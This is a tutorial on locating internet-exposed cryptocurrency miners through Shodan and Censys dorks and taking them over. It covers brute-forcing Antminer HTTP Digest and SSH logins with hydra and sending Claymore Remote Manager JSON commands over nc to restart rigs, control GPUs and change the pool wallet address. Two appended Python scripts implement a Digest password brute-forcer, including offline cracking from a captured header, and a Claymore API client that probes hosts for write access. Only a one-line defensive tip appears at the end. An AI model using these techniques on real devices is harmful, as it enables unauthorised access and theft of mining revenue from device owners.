Hacking Cryptocurrency Miners with OSINT Technologies
NOTE: All the methods I have explained are used at your own risk.
Open Source Intelligence (OSINT) is one of the very first techniques used to gather information before an attack, and many hacking cases in the past have started with it. With the growth of IoT devices, we can collect a lot of critical data from the public web. In this article we will be gathering critical data on cryptocurrency miners: Bitcoin (Antminer) and Ethereum (Claymore).
Many cryptocurrency mining devices and programs need an internet connection to send and receive data, and that exposure is what gives attackers a foothold.
Reconnaissance of the Antminer!
The most widely used Bitcoin ASIC miners are the Antminer S9 and S7. The miner's firmware runs a "lighttpd/1.4.32" web server, and some units also expose an SSH port. A public exploit exists for lighttpd 1.4.31, but it does not give you access to the server.
The web interface on that server is protected by HTTP Digest Authentication. The critical point is that the miner needs a username and password to log in.
It is well known that OSINT collection starts with some piece of information or a keyword. Here that keyword is "antMiner Configuration", which appears in the HTTP headers (it is the realm of the server's Digest challenge) every time a request is sent to the miner.
I searched censys.io and shodan.io with some specific dorks for that keyword and collected the IP addresses.
The system can then be accessed by a brute-force attack on the HTTP port or on the SSH port.
First I needed the user guide to learn the default HTTP username and password. I searched Google for "antminer default password" and found a website hosting the User Guide.
For this tutorial I used hydra to brute-force the HTTP Digest Authentication with a list of the 10,000 most common exposed passwords. Burp Suite Intruder works too.
If you are lucky, you get into the configuration page.
From there an attacker can edit the page as desired.
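To make the brute-force step concrete, here is an added example written for this page (it is not code from the original post, from hydra or from Burp). It fingerprints a device by the realm in its Digest challenge and then runs a wordlist against a constructed server stand-in, which is exactly what hydra's `http-get` module does per candidate, minus the network. Assumptions: the "antMiner Configuration" keyword is the `realm` of the `WWW-Authenticate: Digest` header, the server uses RFC 2617 MD5 with `qop=auth`, and the sample challenge, username, password and wordlist are made up for the demo.

```python
"""Fingerprint an HTTP Digest challenge and brute-force it offline.

Added example, not from the original post. Assumptions (labelled):
- the "antMiner Configuration" keyword is the Digest realm;
- RFC 2617 MD5 with qop=auth;
- make_oracle() is a constructed stand-in for the real miner, so this
  runs with no network access; a real run sends the Authorization
  header and checks for HTTP 200 instead of 401.
"""
import hashlib
import re
from typing import Callable, Dict, Iterable, Optional

# Constructed challenge, shaped like the header a Digest-protected miner sends.
SAMPLE_CHALLENGE = (
    'Digest realm="antMiner Configuration", '
    'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", qop="auth"'
)
# Constructed wordlist; a real run would use the 10,000-password list.
WORDLIST = ["123456", "password", "admin", "root", "miner2017"]

_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_challenge(header: str) -> Dict[str, str]:
    """Split a WWW-Authenticate: Digest header into its parameters."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest challenge")
    return {k: (quoted if quoted else bare)
            for k, quoted, bare in _PARAM_RE.findall(params)}


def is_antminer(header: str) -> bool:
    """The OSINT fingerprint: the realm names the device type."""
    try:
        realm = parse_challenge(header).get("realm", "")
    except ValueError:
        return False
    return "antminer configuration" in realm.lower()


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str,
                    uri: str, nonce: str, nc: str = "00000001",
                    cnonce: str = "0a4f113b", qop: str = "auth") -> str:
    """RFC 2617 response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def make_oracle(username: str, realm: str, password: str) -> Callable[[dict], bool]:
    """Constructed stand-in for the miner: recompute the response from the
    real credentials, as the server does, and accept only an exact match."""
    def check(authz: dict) -> bool:
        expected = digest_response(username, realm, password, authz["method"],
                                   authz["uri"], authz["nonce"], authz["nc"],
                                   authz["cnonce"], authz["qop"])
        return authz["response"] == expected
    return check


def brute_force(challenge: str, username: str, method: str, uri: str,
                wordlist: Iterable[str],
                oracle: Callable[[dict], bool]) -> Optional[str]:
    """Per candidate: build the response for the captured nonce and ask the
    server whether it is accepted. Returns the password that worked, or None."""
    ch = parse_challenge(challenge)
    for candidate in wordlist:
        attempt = {
            "method": method, "uri": uri, "nonce": ch["nonce"],
            "nc": "00000001", "cnonce": "0a4f113b", "qop": ch.get("qop", "auth"),
            "response": digest_response(username, ch["realm"], candidate,
                                        method, uri, ch["nonce"]),
        }
        if oracle(attempt):
            return candidate
    return None


if __name__ == "__main__":
    oracle = make_oracle("root", "antMiner Configuration", "miner2017")  # constructed creds
    print("antminer?", is_antminer(SAMPLE_CHALLENGE))
    print("found:", brute_force(SAMPLE_CHALLENGE, "root", "GET", "/", WORDLIST, oracle))
```

Two practical caveats when moving this onto a real target: a server may reject a nonce after one use or after a timeout, so a real tool has to re-read the challenge when it gets a 401 with `stale=true`; and the MD5 construction means that once you have captured one challenge and one valid Authorization header (for example from a plaintext HTTP session), the same loop works fully offline against that pair, with no requests to the miner at all.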
Claymore Miner Software
Another kind of attack targets the Claymore Miner software (the Ethereum, Zcash and other altcoin miners).
I made another search on shodan.io with some specific dorks.
The Claymore Remote Manager API accepts JSON packets that let you manage the mining server remotely.
With it we can control the GPUs (disable them, switch dual mode, and so on) or edit config.txt to change the pool wallet address, just by sending a few commands.
To find out whether a given instance is read-only or read/write, we send a "miner_restart" or "control_gpu" command. I used nc on macOS to send the JSON commands.
First we try the "miner_getstat1" command.
Then we send "control_gpu" to see whether the instance is read-only or read/write.
On this host we received an error for the command we sent.
When I tried a different IP I succeeded in restarting the system, which shows that the Claymore Remote Manager API on that host allows read/write access.
The Claymore Remote Manager also lets you edit the config file by sending it in JSON format. It is easier, though, to do this with Claymore's Ethereum Dual Miner Manager on Windows, which can also switch the pool wallet address.
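The getstat1 / control_gpu / miner_restart exchange above, as an added example written for this page (it is not code from the original post or from Claymore). It builds the JSON requests the post sends with nc, parses the miner_getstat1 result array, and classifies an instance as read-only or read/write the way the post does, by trying a write command. Assumptions, all labelled in the code: Claymore listens on the TCP port given by `-mport` (3333 by default, a negative value makes it read-only) and speaks newline-terminated JSON-RPC 2.0 with an optional `psw` field for a `-mpsw` password; `FakeMiner` is a constructed stand-in so the script runs offline, and the error strings and statistics it returns are made up (the real miner's exact error text is not known here).

```python
"""Talk to the Claymore Remote Manager API and tell read-only from read/write.

Added example, not from the original post or from Claymore. Assumptions:
- TCP -mport (3333 by default; negative -mport means read-only), one
  newline-terminated JSON-RPC 2.0 request per connection, optional "psw";
- FakeMiner is a constructed stand-in; its error strings and numbers are
  invented so the script runs with no network access.
"""
import json
import socket
from typing import Callable, Dict, List, Optional


def build_request(method: str, params: Optional[List[str]] = None,
                  psw: Optional[str] = None, req_id: int = 0) -> str:
    """Encode one request exactly as you would pipe it into `nc HOST 3333`."""
    req: Dict = {"id": req_id, "jsonrpc": "2.0", "method": method}
    if params is not None:
        req["params"] = params
    if psw is not None:                  # only needed if the miner runs with -mpsw
        req["psw"] = psw
    return json.dumps(req) + "\n"


def send_tcp(host: str, port: int, payload: str, timeout: float = 5.0) -> dict:
    """Real transport: one request, one JSON reply. Not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload.encode())
        buf = b""
        while not buf.endswith(b"\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return json.loads(buf.decode())


def parse_getstat1(reply: dict) -> dict:
    """Pull the useful fields out of miner_getstat1's positional result array."""
    r = reply["result"]
    total, shares, rejected = r[2].split(";")
    return {
        "version": r[0],
        "uptime_min": int(r[1]),
        "hashrate_khs": int(total),
        "shares": int(shares),
        "rejected": int(rejected),
        "per_gpu_khs": [int(x) for x in r[3].split(";")],
        "pool": r[7],
    }


def probe_access(send: Callable[[str], dict], psw: Optional[str] = None) -> str:
    """The post's test: read stats first, then try control_gpu on GPU 0
    (mode "1" = ETH-only). An error on the write means read-only."""
    stat = send(build_request("miner_getstat1", psw=psw))
    if stat.get("error"):
        return "unreachable/auth-failed"
    probe = send(build_request("control_gpu", ["0", "1"], psw=psw))
    return "read-only" if probe.get("error") else "read/write"


class FakeMiner:
    """Constructed stand-in for a Claymore instance, NOT the real software.
    handle() takes the raw request line and returns the decoded reply."""
    WRITE_METHODS = {"control_gpu", "miner_restart", "miner_reboot", "miner_file"}

    def __init__(self, read_only: bool, psw: Optional[str] = None):
        self.read_only, self.psw = read_only, psw
        self.restarts = 0

    def handle(self, raw: str) -> dict:
        req = json.loads(raw)
        rid = req.get("id", 0)
        if self.psw is not None and req.get("psw") != self.psw:
            return {"id": rid, "result": None, "error": "bad password"}     # invented text
        if req["method"] == "miner_getstat1":
            # Array layout follows the documented getstat1 shape; values are made up.
            return {"id": rid, "error": None, "result": [
                "11.9 - ETH", "21", "182724;51;0",
                "30502;30457;30297;30481;30479;30508",
                "0;0;0", "off;off;off;off;off;off",
                "53;71;57;67;61;72;55;70;59;71;61;70",
                "pool.example:9999", "0;1;0;1"]}
        if req["method"] in self.WRITE_METHODS:
            if self.read_only:
                return {"id": rid, "result": None, "error": "read-only mode"}  # invented text
            if req["method"] == "miner_restart":
                self.restarts += 1
            return {"id": rid, "result": "ok", "error": None}
        return {"id": rid, "result": None, "error": "unknown method"}


if __name__ == "__main__":
    for ro in (True, False):
        miner = FakeMiner(read_only=ro)
        print("read_only =", ro, "->", probe_access(miner.handle))
    # Against a real host you would pass a closure over send_tcp instead:
    #   probe_access(lambda p: send_tcp("203.0.113.10", 3333, p))
```

The defensive reading of the same code: an operator who cannot firewall port 3333 should at least run with a negative `-mport` value and set `-mpsw`, which turns `probe_access` from "read/write" into "read-only" or "auth-failed" without changing anything else about the miner.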